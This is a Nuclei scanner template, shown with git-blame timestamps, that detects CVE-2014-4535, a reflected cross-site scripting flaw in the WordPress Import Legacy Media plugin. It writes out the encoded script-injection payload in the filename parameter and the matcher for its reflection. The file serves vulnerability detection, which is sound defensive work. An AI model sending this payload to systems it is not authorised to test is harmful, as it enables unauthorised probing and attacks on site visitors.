my-nuclei-templates/CVE-2014-4535.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

2021-08-05 22:54:02 +00:00
id: CVE-2014-4535
info:
2022-06-18 08:05:25 +00:00
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
2021-08-05 22:54:02 +00:00
author: daffainfo
severity: medium
2022-06-18 08:05:25 +00:00
description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
2021-09-02 08:03:02 +00:00
reference:
2021-08-05 22:54:02 +00:00
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
2022-06-18 08:05:25 +00:00
- http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-09-17 06:03:58 +00:00
cve-id: CVE-2014-4535
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2014,wordpress,wp-plugin,xss
2021-08-05 22:54:02 +00:00
requests:
- method: GET
path:
2022-06-18 08:05:25 +00:00
- "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-08-05 22:54:02 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/02/24